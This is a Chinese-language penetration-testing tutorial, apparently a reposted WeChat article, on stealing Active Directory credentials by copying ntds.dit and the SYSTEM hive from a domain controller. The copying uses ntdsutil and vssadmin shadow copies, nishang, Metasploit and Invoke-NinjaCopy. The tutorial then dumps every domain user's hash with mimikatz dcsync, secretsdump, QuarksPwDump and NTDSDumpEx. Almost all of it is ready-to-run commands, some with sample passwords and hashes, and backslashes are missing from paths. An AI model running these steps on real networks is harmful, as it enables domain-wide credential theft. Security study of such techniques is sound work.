ntds.dit
ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsnap工具。
离线获取ntds.dit
vss快照方式
ntdsutil
ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
挂载快照
ntdsutil snapshot "mount 521972bf-3b80-470c-aa9b-f40ee0f9be57" quit quit
复制出来ntds和system
copy C:$SNAP_202009131458_VOLUMEC$windowsNTDSntds.dit c:ntds.dit
copy C:$SNAP_202009131458_VOLUMEC$windowssystem32configSYSTEM c:SYSTEM
卸载和删除快照
ntdsutil snapshot "unmount {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quit
ntdsutil snapshot "delete {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quit
vssadmin
查看快照
vssadmin list shadows
创建快照
vssadmin create shadow /for=c:
复制出来ntds和system
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:ntds.dit
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowssystem32configSYSTEM C:SYSTEM
删除快照
vssadmin delete shadows /for=c: /quiet
PS:直接是无法访问?快照中的内容的,需要创建链接才可以:
mklink/dc:vssfile\?GLOBALROOTDeviceHarddiskVolumeShadowCopy3
nishang:copy-vss.ps1
nishang的Copy-VSS.ps1可进行快捷的
开启ps执行脚本权限:
Set-ExecutionPolicy Unrestricted
copy到当前目录:
Copy-VSS
msf:psexec_ntdsgrab
admin/smb/psexec_ntdsgrab
NinjaCopy方式
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1
Set-ExecutionPolicy Unrestricted
导入ps模块并导出ntds:
Import-Module .invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination C:\system
Invoke-NinjaCopy -Path "C:windowsntdsntds.dit" -LocalDestination "C:\ntds.dit"
ntds.dit中提取hash
mimikatz
lsadump::dcsync /domain:fox.com /all /csv
secretsdump.py
secretsdump.py -ntds ./ntds.dit -system ./SYSTEM LOCAL
secretsdump.py fox/admintests:QWEqwe123@172.16.58.147
或者
secretsdump.py fox/admintests@172.16.58.147 -hashes aad3b435b51404eeaad3b435b51404ee:621cdf4b49c06ec28caa7a6cab4ebac8
QuarksPwDump.exe
esentutl /p /o ntds.dit
再使用QuarksPwDump.exe进行提取
.QuarksPwDump.exe --dump-hash-domain --output userhash.txt --ntds-file .ntds.dit
NTDSDumpEx
.NTDSDumpEx.exe -d ntds.dit -s SYSTEM
本文始发于微信公众号(SecIN技术平台):原创 | 域之ntds.dit
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论